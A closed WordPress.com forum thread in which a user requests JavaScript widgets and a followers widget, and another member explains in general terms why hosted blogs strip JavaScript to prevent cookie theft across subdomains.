Javascript code widgets

  • Unknown's avatar
    swathipradeep · Member ·

    Hi,
    I sincerely appreciate the features provided by wordpress.com. All the features are commendable. But the only 2 lacking features are 1>Javascript code widgets 2>Followers widgets

    Javascript enable widget:
    If you plug in the javascript and save the text widget,everything goes blank. I understand that Javascripts are stripped for security reasons on wordpress, but I guess few Javascripts from Facebook,Twitter and other recognised services can be allowed on wordpress. What say?

    Followers Widget:
    This widget lets us know the “popularity” of our work and writings. It encourages the bloggers to continue producing commendable content based on the # og people who follow their blogs. Could you please bring in the “followers” widget like blogger?

    WordPress surpasses Blogger in many things and addition of these 2 above features takes wordpress to great heights

    The blog I need help with is: (visible only to logged in users)

  • Unknown's avatar
    timethief · Member ·

    addition of these 2 above features takes wordpress to great heights

    As both javascript and widgets containing javascript ie. containing bad javascript are a serious threat to security on a multiuser blogging platform like wordpress.com I do not hold the same viewpoint as you do.

    Always keep in mind that many of known security exploits use JavaScript code to perform security breaches. Let me explain (for those who don’t already know) why wordpress.com can’t allow javascript on free hosted blogs on their wpMU (multi-user blogging platform.

    Blogs are served from {name}.wordpress.com. The WordPress cookie is delivered to any site that ends in wordpress.com. Any Javascript on the page is legitimately allowed to look up cookies that would be sent to the domain it’s served from.

    This means that if you can run Javascript on a hosted WordPress page, you can retrieve the login cookie from another WordPress user, and then pass it to an external site. (Generally by creating an image reference that includes the encoded login cookie.)

    This is just a basic part of the underlying technology of the web browser, and it’s required for sites like gmail, Yahoo!, and others to operate.

    There are ways a site can avoid this problem (generally by constantly changing the login cookie data with EVERY response, and invalidating the old ones immediately), but they require more horsepower on the backend than the blogging sites are really able to provide, and there’s still usually a small window of opportunity.

    This is why Livejournal, WordPress, and most other hosted sites disallow Javascript on their pages. I hope that helps!

  • The topic ‘Javascript code widgets’ is closed to new replies.